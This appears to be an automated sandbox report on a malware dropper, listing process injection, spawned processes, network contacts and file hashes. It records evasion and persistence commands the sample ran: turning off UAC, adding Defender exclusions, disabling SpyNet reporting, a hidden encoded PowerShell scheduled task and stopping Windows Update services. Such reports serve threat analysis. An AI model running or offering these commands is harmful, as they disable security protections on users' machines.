PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
PID 4424 wrote to memory of 2864 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"

C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe

"C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe"

C:\Users\Admin\Pictures\nE9EqWiRmQP64KM8Kw99mB7B.exe

"C:\Users\Admin\Pictures\nE9EqWiRmQP64KM8Kw99mB7B.exe"

C:\Users\Admin\Pictures\pGyleBy48sPigxl6BDblZ9bY.exe

"C:\Users\Admin\Pictures\pGyleBy48sPigxl6BDblZ9bY.exe"

C:\Users\Admin\Pictures\3JogIHR6pHlwcUKAOIZEMcTE.exe

"C:\Users\Admin\Pictures\3JogIHR6pHlwcUKAOIZEMcTE.exe"

C:\Users\Admin\AppData\Local\Temp\is-SPEI2.tmp\is-18M67.tmp

"C:\Users\Admin\AppData\Local\Temp\is-SPEI2.tmp\is-18M67.tmp" /SL4 $8020C "C:\Users\Admin\Pictures\pGyleBy48sPigxl6BDblZ9bY.exe" 2846236 52224

C:\Users\Admin\AppData\Local\Temp\is-D5BQP.tmp\_isetup\_setup64.tmp

helper 105 0x404

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\XLgvMgJGOgxCvrgsjoSqFfWx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\XLgvMgJGOgxCvrgsjoSqFfWx.exe" --version

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2f4,0x2f8,0x2fc,0x2c4,0x300,0x6d968538,0x6d968548,0x6d968554

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 29

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -s

C:\Users\Admin\Pictures\Z9QDeA1jpkEuc49KxOXq7Glf.exe

"C:\Users\Admin\Pictures\Z9QDeA1jpkEuc49KxOXq7Glf.exe"

C:\Windows\system32\schtasks.exe

"schtasks" /Query /TN "DigitalPulseUpdateTask"

C:\Users\Admin\AppData\Local\Temp\7zSD4F3.tmp\Install.exe

.\Install.exe

C:\Windows\system32\schtasks.exe

"schtasks" /Create /TN "DigitalPulseUpdateTask" /SC HOURLY /TR "C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseUpdate.exe"

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

"C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe" 5333:::clickId=:::srcId=

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Users\Admin\AppData\Local\Temp\7zSDA33.tmp\Install.exe

.\Install.exe /DdidCJjeH "385120" /S

C:\Users\Admin\Pictures\0jyPoep2iLwbFR5el0WC2cG2.exe

"C:\Users\Admin\Pictures\0jyPoep2iLwbFR5el0WC2cG2.exe"

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -i

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe

"C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3892 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231006140636" --session-guid=0d437dcc-e127-4ed3-aff6-75a471467e8b --server-tracking-blob=Y2M3YjMzNjRiYzJlZWU2ZjlkMjhhYjQxNTY3ZGZlOGY5ZDQ2NDM0NzNkODVlMTcxNzhiMGYxNTE0MTBlN2I3YTp7ImNvdW50cnkiOiJVUyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5NjYwMTE4OS40MTI4IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJjNGYzNDJmYi01NDk0LTQwMjktOWViMC00ZjAyNWY5ZjQ2ZmQifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C05000000000000

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 29

C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe

"C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe"

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6fa88538,0x6fa88548,0x6fa88554

C:\Users\Admin\AppData\Local\Temp\is-CJSU9.tmp\BvlSEw2eUWZ36nk3wRWQ7HZw.tmp

"C:\Users\Admin\AppData\Local\Temp\is-CJSU9.tmp\BvlSEw2eUWZ36nk3wRWQ7HZw.tmp" /SL5="$B0064,5025136,832512,C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe

"C:\Users\Admin\Pictures\XLgvMgJGOgxCvrgsjoSqFfWx.exe" --silent --allusers=0

C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe

"C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\HFAbana3CGb6NBB6jb0QFoFg.exe

"C:\Users\Admin\Pictures\HFAbana3CGb6NBB6jb0QFoFg.exe"

C:\Users\Admin\Pictures\gGJrfkcvNpg9HV2A9dPXPCYP.exe

"C:\Users\Admin\Pictures\gGJrfkcvNpg9HV2A9dPXPCYP.exe"

C:\Users\Admin\Pictures\Y6OpfsDD1gnwJx7HuXkn4hOI.exe

"C:\Users\Admin\Pictures\Y6OpfsDD1gnwJx7HuXkn4hOI.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gbXIrIWRB" /SC once /ST 02:34:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gbXIrIWRB"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310061406361\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310061406361\assistant\Assistant_100.0.4815.21_Setup.exe_sfx.exe"

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310061406361\assistant\assistant_installer.exe

"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310061406361\assistant\assistant_installer.exe" --version

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

Network

Country Destination Domain Proto
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 8.8.8.8:53 yip.su udp
US 104.20.67.143:443 pastebin.com tcp
DE 148.251.234.93:443 yip.su tcp
US 8.8.8.8:53 d062.userscloud.net udp
DE 168.119.140.62:443 d062.userscloud.net tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 update.wf udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 drivelikea.com udp
US 172.67.216.81:443 flyawayaero.net tcp
US 8.8.8.8:53 hbn42414.beget.tech udp
US 8.8.8.8:53 lancetjournal.com udp
US 8.8.8.8:53 lycheepanel.info udp
US 8.8.8.8:53 goboh2b.top udp
US 8.8.8.8:53 galandskiyher4.com udp
US 8.8.8.8:53 net.geo.opera.com udp
NL 13.227.219.25:443 downloads.digitalpulsedata.com tcp
US 8.8.8.8:53 grupoeca.co udp
US 188.114.96.0:443 lancetjournal.com tcp
RU 91.212.166.16:443 update.wf tcp
US 8.8.8.8:53 link.storjshare.io udp
US 85.217.144.143:80 85.217.144.143 tcp
US 104.21.32.208:443 lycheepanel.info tcp
US 188.114.96.0:443 lancetjournal.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
NL 185.26.182.112:80 net.geo.opera.com tcp
US 8.8.8.8:53 potatogoose.com udp
NL 185.26.182.112:443 net.geo.opera.com tcp
RU 87.236.19.5:80 hbn42414.beget.tech tcp
US 172.67.180.173:443 potatogoose.com tcp
US 8.8.8.8:53 winterhunter.org udp
US 104.21.20.38:443 winterhunter.org tcp
NL 194.169.175.127:80 galandskiyher4.com tcp
US 72.29.85.225:443 grupoeca.co tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 62.140.119.168.in-addr.arpa udp
US 8.8.8.8:53 81.216.67.172.in-addr.arpa udp
US 8.8.8.8:53 25.219.227.13.in-addr.arpa udp
US 8.8.8.8:53 0.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 143.144.217.85.in-addr.arpa udp
US 8.8.8.8:53 208.32.21.104.in-addr.arpa udp
US 8.8.8.8:53 2.77.0.136.in-addr.arpa udp
US 8.8.8.8:53 112.182.26.185.in-addr.arpa udp
US 8.8.8.8:53 16.166.212.91.in-addr.arpa udp
US 8.8.8.8:53 173.180.67.172.in-addr.arpa udp
US 8.8.8.8:53 5.19.236.87.in-addr.arpa udp
US 8.8.8.8:53 38.20.21.104.in-addr.arpa udp
US 8.8.8.8:53 127.175.169.194.in-addr.arpa udp
US 8.8.8.8:53 225.85.29.72.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
MU 156.236.72.121:443 z.nnnaajjjgc.com tcp
US 8.8.8.8:53 121.72.236.156.in-addr.arpa udp
US 8.8.8.8:53 autoupdate.geo.opera.com udp
US 8.8.8.8:53 desktop-netinstaller-sub.osp.opera.software udp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.216.20:443 autoupdate.geo.opera.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 20.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 121.217.145.82.in-addr.arpa udp
US 8.8.8.8:53 147.174.42.23.in-addr.arpa udp
US 8.8.8.8:53 m7val1dat0r.info udp
US 8.8.8.8:53 68.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 features.opera-api2.com udp
US 188.114.97.0:443 m7val1dat0r.info tcp
NL 82.145.216.16:443 features.opera-api2.com tcp
US 8.8.8.8:53 download.opera.com udp
NL 185.26.182.122:443 download.opera.com tcp
US 8.8.8.8:53 download3.operacdn.com udp
US 8.8.8.8:53 16.216.145.82.in-addr.arpa udp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 122.182.26.185.in-addr.arpa udp
GB 95.101.143.243:443 download3.operacdn.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 243.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 app.nnnaajjjgc.com udp
US 8.8.8.8:53 9.57.101.20.in-addr.arpa udp
HK 154.221.26.108:80 app.nnnaajjjgc.com tcp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 bapp.digitalpulsedata.com udp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
CA 3.98.219.138:443 bapp.digitalpulsedata.com tcp
US 8.8.8.8:53 138.219.98.3.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
NL 94.142.138.131:80 94.142.138.131 tcp
US 8.8.8.8:53 api.myip.com udp
US 172.67.75.163:443 api.myip.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 131.138.142.94.in-addr.arpa udp
US 8.8.8.8:53 163.75.67.172.in-addr.arpa udp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
NL 82.145.217.121:443 desktop-netinstaller-sub.osp.opera.software tcp
US 8.8.8.8:53 vk.com udp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:80 vk.com tcp
US 8.8.8.8:53 78.132.240.87.in-addr.arpa udp
RU 87.240.132.78:80 vk.com tcp
RU 87.240.132.78:443 vk.com tcp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp

Files

memory/4424-0-0x00000000003C0000-0x0000000000422000-memory.dmp

memory/4424-1-0x0000000074E30000-0x00000000755E0000-memory.dmp

memory/4424-2-0x0000000004ED0000-0x0000000004F6C000-memory.dmp

memory/4424-3-0x0000000005670000-0x0000000005C14000-memory.dmp

memory/4424-4-0x00000000051C0000-0x0000000005252000-memory.dmp

memory/4424-5-0x0000000004D40000-0x0000000004D50000-memory.dmp

memory/4424-6-0x0000000004DA0000-0x0000000004DAA000-memory.dmp

memory/4424-7-0x0000000005070000-0x00000000050BC000-memory.dmp

memory/4424-8-0x0000000005590000-0x00000000055AA000-memory.dmp

memory/2864-9-0x0000000000400000-0x0000000000408000-memory.dmp

memory/4612-10-0x0000000004ED0000-0x0000000004F06000-memory.dmp

memory/4612-12-0x0000000074E30000-0x00000000755E0000-memory.dmp

memory/4424-13-0x0000000074E30000-0x00000000755E0000-memory.dmp

memory/4612-14-0x0000000005540000-0x0000000005B68000-memory.dmp

memory/2864-15-0x0000000074E30000-0x00000000755E0000-memory.dmp

memory/4612-16-0x0000000002B30000-0x0000000002B40000-memory.dmp

memory/2864-17-0x00000000056D0000-0x00000000056E0000-memory.dmp

memory/4612-18-0x00000000054C0000-0x00000000054E2000-memory.dmp

memory/4612-19-0x0000000005D20000-0x0000000005D86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_22ncwtn3.pwc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4612-25-0x0000000005E40000-0x0000000005EA6000-memory.dmp

memory/4612-30-0x0000000005EB0000-0x0000000006204000-memory.dmp

C:\Users\Admin\Pictures\EVKS9b1Iu6vXLGa4GRP60Loi.exe

MD5 24fe48030f7d3097d5882535b04c3fa8
SHA1 a689a999a5e62055bda8c21b1dbe92c119308def
SHA256 424a2551d356754c882d04ac16c63e6b50b80b159549d23231001f629455756e
SHA512 45a842447d5e9c10822f7d5db1192a0e8e7917e6546dab6aebe2542b5a82bedc26aa8d96e3e99de82e2d0b662fcac70d6914248371af034b763f5dd85dab0c51

memory/4612-42-0x00000000064A0000-0x00000000064BE000-memory.dmp

memory/4612-43-0x00000000064E0000-0x000000000652C000-memory.dmp

C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

C:\Users\Admin\Pictures\gWmNUi5KAnInwLJ0jNfwJOON.exe

MD5 9d8d5955c120589d126c6f0ad26f2506
SHA1 521ca7d3977a9c99da92532722f66d7b09940e64
SHA256 c7c4172738b86422159a6c80931b45e7f788364be996a1f657ed3a570d429592
SHA512 0f173547f28d89b4a4cc76b2b553f27d3575ad3349728d889e28700d66aa4b2768e1721779428a5014eeab32de63e48595ccf56ed2c25fe79ed13dc43826f701

C:\Users\Admin\Pictures\pGyleBy48sPigxl6BDblZ9bY.exe

MD5 79612b891b45f9bcf1f5013f75d6eaa9
SHA1 228619fdd7966b13eac6644a6e90f4c97ad35475
SHA256 b35ebfe075a4ce5a92d18569189dcd404fc3e6a777599d43876ee8479fb665a9
SHA512 7058568ab483def06534db00e0eda1f11387676575cb69ae3f7847a1e45aad017efc96653686fe362eebae8e8676b1635b0e88108db608feaf7e0893856d8bfa

C:\Users\Admin\Pictures\HFAbana3CGb6NBB6jb0QFoFg.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\gGJrfkcvNpg9HV2A9dPXPCYP.exe

MD5 601c7844cdbade71ea487a802b6c6d75
SHA1 921cb88ab70e76e798fed47404193a3f88464d88
SHA256 38a45e6148878dac4c9a72dc779d9d402b1816c6b71e4da314dbfcd533751d3c
SHA512 76a86ac724102ebfe4f1bf017e6627c40ce212f317ef699cf39ae83ab1f2e6fc69b49df36f388c8d9b6f4faa21b3cd81202fa1cbf89e842941c798b7bb3522c4

C:\Users\Admin\Pictures\nE9EqWiRmQP64KM8Kw99mB7B.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

C:\Users\Admin\Pictures\gGJrfkcvNpg9HV2A9dPXPCYP.exe

MD5 601c7844cdbade71ea487a802b6c6d75
SHA1 921cb88ab70e76e798fed47404193a3f88464d88
SHA256 38a45e6148878dac4c9a72dc779d9d402b1816c6b71e4da314dbfcd533751d3c
SHA512 76a86ac724102ebfe4f1bf017e6627c40ce212f317ef699cf39ae83ab1f2e6fc69b49df36f388c8d9b6f4faa21b3cd81202fa1cbf89e842941c798b7bb3522c4

C:\Users\Admin\Pictures\Y6OpfsDD1gnwJx7HuXkn4hOI.exe

MD5 2a11bdca15f3f99d319ef86ddc187bf7
SHA1 24ec21930bed314c15543a5df6ac05c09f919ef1
SHA256 f65464cc8178573d4318c18454658712bc4d922422c3d0d5fab43d2dfe16cd9e
SHA512 b6944388601fe1c234334a58bf2ba452a5e358f08daffab2af21d55df44df387da241ca672cfa265f8b2bafad29bdf943e1b2d65dafc082fb407550580a840b1

memory/4148-128-0x0000000000400000-0x0000000000413000-memory.dmp

memory/3496-134-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\Pictures\BvlSEw2eUWZ36nk3wRWQ7HZw.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
